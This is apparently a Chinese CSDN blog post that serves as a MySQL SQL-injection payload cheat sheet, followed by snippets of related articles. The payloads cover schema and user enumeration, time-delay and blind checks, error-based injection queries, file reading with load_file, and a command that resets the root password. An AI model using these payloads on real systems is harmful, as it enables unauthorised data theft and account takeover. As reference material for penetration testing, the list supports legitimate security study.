MySQL Payload

最新推荐文章于 2024-05-24 15:55:04 发布
最新推荐文章于 2024-05-24 15:55:04 发布
阅读量519 收藏 9
点赞数 3
文章标签: mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_79556885/article/details/137401794
版权
本文详细列举了SQL注入中的常见Payload,涉及版本查询、用户信息获取、数据库操作、条件判断、加密解密、延迟执行、错误利用、密码修改以及文件写入等,强调了安全防范的重要性,包括了解报错注入的函数和管理MySQL的文件权限。
摘要由CSDN通过智能技术生成

常见Payload

  • Version

    • SELECT @@version

  • Comment

    • SELECT 1 -- comment
    • SELECT 1 # comment
    • SELECT /*comment*/1

  • Space

    • 0x9 0xa-0xd 0x20 0xa0

  • Current User

    • SELECT user()
    • SELECT system_user()
    • SELECT current_role()

  • List User

    • SELECT user FROM mysql.user

  • Current Database

    • SELECT database()

  • List Database

    • SELECT schema_name FROM information_schema.schemata

  • List Tables

    • SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

  • List Columns

    • SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

  • If

    • SELECT if(1=1,'foo','bar'); return 'foo'

  • Ascii

    • SELECT char(0x41)
    • SELECT ascii('A')
    • SELECT 0x414243 => return ABC

  • Delay

    • sleep(1)
    • SELECT BENCHMARK(1000000,MD5('A'))

  • Read File

    • select @@datadir
    • select load_file('databasename/tablename.MYD')

  • Blind

    • ascii(substring(str,pos,length)) & 32 = 1

  • Error Based

    • select count(*),(floor(rand(0)*2))x from information_schema.tables group by x;
    • select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))

  • Change Password

    • mysql -uroot -e "use mysql;UPDATE user SET password=PASSWORD('newpassword') WHERE user='root';FLUSH PRIVILEGES;"

报错注入常见函数

  • extractvalue
  • updatexml
  • GeometryCollection
  • linestring
  • multilinestring
  • multipoint
  • multipolygon
  • polygon
  • exp

写文件

写文件前提

  • root 权限
  • 知晓文件绝对路径
  • 写入的路径存在写入权限
  • secure_file_priv 允许向对应位置写入
  • select count(file_priv) from mysql.user
黑客V1
关注
MySQL注入--Payload
m0_37595954的博客
10-25 1149
MySQL注入--Payload Mirror王宇阳 2019-10-22 SQL的注入流程一般如下: 1、判断是否有SQL注入漏洞(判断注入点) 2、判断 数据库的系统架构、数据库名、web应用类型等 3、获取数据库信息 4、加密信息破解 5、进行提权 前篇 注入漏洞分类: 数字型注入: 当输入(注入)的参数为整数,则可以认为该漏洞注入点为数字型注入; htt...
SQL注入(没有原理,分类payload
weixin_46709219的博客
08-13 834
一)关于数据库的一些基本知识: MySQL5.0以下,没有information_schema这个系统表,无法列表名等,只能暴力跑表名。 MySQL5.0以上,MySQL中默认添加了一个名为 information_schema 的数据库,该数据库中的表都是只读的,不能进行更新、删除和插入等操作,也不能加载触发器,因为它们实际只是一个视图,不是基本表,没有关联的文件。 mysql中注释符: 单行注释:#       多行注释:/**/ information_schema数据库中三个很重要的表: 1)in
mysql数据库之报错注入常用payload
Websec
02-20 1402
flloor报错注入 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);   ExtractValue报错注入 and extractvalue(1, concat(0x5c, (select table_na...
MySQL报错注入
秋水的博客
09-03 1503
注入简介 什么是报错注入? 顾名思义,报错注入就是通过页面爆出的错误信息,构造合适的语句来获取我们想要的数据,本章节讲述的注入,数据库MySQL 报错注入成因 那么报错注入是怎么形成的呢? 首先是应用系统未关闭数据库报错函数,对于一些SQL语句的错误,直接回显在了页面上,部分甚至直接泄露数据库名和表名; 其次,必不可少就是后台未对MySQL相应的报错函数进行过滤 引入知识 ...
SQL 报错注入详解
2301_78008478的博客
05-08 991
近期学习 SQL 报错注入,本篇文章为关于报错注入的一些个人理解,如有错误,希望指出 本文使用 sqli-labs 数据库作为示例报错注入方式有很多,其中比较常见的有 floor() 、extractvalue() 、updatexml() 三种,本篇文章主要对这三种进行分析先贴上一个常见的 payload 再进行分析 (sqli-labs Less-5) 复制首先这个 payload 和网上很多的不太一样,查阅网上相关博客时发现大多数的 payload 都是这样写的 复制这个就是把发生报错的 se
mysql payload
10-01
MySQL payload是指在使用MySQL数据库时,通过特定的语句或代码来执行一系列恶意操作的数据。它可以被用来进行各种攻击,例如注入攻击、拒绝服务攻击等。如引用中所示,可以通过构建恶意的SQL语句来实现注入攻击。在...
mysql盲注总结
z7sz的博客
06-21 1146
本文的内容主要是对mysql盲注的总结
SQL_Injection_Payload:SQL注入有效负载列表
01-28
标题“SQL_Injection_Payload:SQL注入有效负载列表”表明这是一个关于SQL注入攻击中使用的特定字符串或命令集合,通常被称为有效负载。 SQL注入的有效负载是精心构造的SQL语句,旨在欺骗数据库服务器执行非授权...
mysql注入大全讲解(很详细哦)
07-24
mysql注入大全讲解(很详细哦),可以学习一下啊,比较全面了
mysql地理位置查询_使用 MySQL 查找附近的位置
weixin_39639919的博客
02-08 690
以下 SQL 语句将会在与坐标 37, -122 相距 25 英里的半径范围内查找最近的 20 个位置。该语句根据行的纬度/经度以及目标纬度/经度计算距离,然后只请求距离值小于 25 的行,最后再按距离对整个查询进行排序,并将查询结果限制为只显示 20 个。要按公里而非英里进行搜索,请将 3959 替换为 6371。SELECT id, ( 3959 * acos( cos( radians(37...
SQL注入(延时注入)---zkaq
weixin_38237216的博客
04-11 4916
1.概念 1.延时注入:当进行盲注的时候,无论输入什么payload都会返回正常的处理信息,无法根据正确与错误的payload得到报错信息。这个时候就需要使用特定的时间函数,通过查看web页面的返回时间差来判断 2.常用函数 sleep() :将程序挂起一段时间n为n秒 if(expr1,expr2,expr3) :判断语句;如果第一个语句正确就执行第二个语句如果错误执行第三个语句 2.靶场 1.pass-13—延时注入(一) 通过题目中的sql语句可知,入参是用"闭合的,使用" and 1=1 – q
mysql地理位置查询_mysql – 有效地搜索地理位置 – LAT / LNG和DECIMAL
weixin_39889642的博客
02-27 439
我有一个带>的数据库750万行(并且正在增长),每个行都有一个图像记录,该图像记录具有特定的LAT / LNG地理位置,表示拍摄照片的位置,存储为DECIMAL值 –mysql> describe image_meta;+---------------------+------------------+------+-----+-------------------+---------...
Mysql注入详细讲解
最新发布
2401_84466359的博客
05-24 1454
*原理:**用户向数据库里存入恶意的数据,在数据被插入到数据库之前,肯定会对数据库进行转义处理,但用户输入的数据的内容肯定是一点摸样也不会变的存进数据库里,而一般都默认为数据库里的信息都是安全的,查询的时候不会进行处理,所以当用户的恶意数据被web程序调用的时候就有可能出发SQL注入。GET/POST提交数据时,发现提交的数据被加密了(可能js加密),那么在提交数据前,抓包,解密,将注入语句写好,然后将整个语句进行加密(相同加密算法),再将数据发过去。HTTP 头注入常常发生在程序采集用户信息的模块中。
MySQL协议包说明
qq_28834355的博客
11-21 1308
Packet基本构成 Packet不能超过16M(224-1 byte,0xffffff),如果超过了会拆成多个Packet发送 Packet头部都必须携带Header信息 Packet拆解 Header信息由4个字节组成,前3字节代表mysql包长度(payload_length),第4字节表示包序号(sequence_id) 从第5个字节开始表示mysql包内容(payload),具体长度由payload_length决定 举个例子,Packet用字节数组表示:49 1 0 0 2 50 22
SQL注入payload(持续更新)
Zeker62的博客
08-31 2737
id='1' order by 3 --+ //%20是空格,%23是# id='2' and 1=2 union select 1,2,datbase()--+ //查数据库 id='3' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ //查表 id='4' and 1=2 union select 1,2,group_co
MySQL注入及绕过备忘录
weixin_43610673的博客
04-25 5181
SQL注入(以Mysql为例) 大致分为有回显和无回显两类进行梳理,重心会放在盲注这一块,正则匹配等一些技巧都放在盲注部分。 使用sql-labs进行演示,在challenges数据库中在添加一个flag数据库表,并修改sql-labs源码使其回显执行的sql语句,方便演示。 判断是否存在SQL注入 本质都是看页面是否出现异常 加单引号’、双引号”、单括号)、双括号))或者进行组合看看是否报错(字符型)。 服务器不返回报错信息时,加 and 1=1 、 and 1=2 看页面是否有变化(数字型),字符型
SQLMAP注入过程payload分析
热门推荐
Breeze的博客
03-31 2万+
众所周知,sqlmap是一款命令自动SQL注入工具,功能非常之多,几乎是用于所有场景,研究分析sqlmap的注入payload过程能使我们对SQL注入的理解更加深刻,也能在以后在一些手工测试的场合拥有更多的思路。 今天我们以一个实际的上海某企业的案例来分析一下sqlmap在基于布尔型盲注的时候的工作思路和注入payload的原理。 目标站点url:http://www.xxxxxxx.com....
sql注入payload总结
recover517的博客
03-04 9143
个人经验加网上的wp总结的注入类型,附上sqlmap命令
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值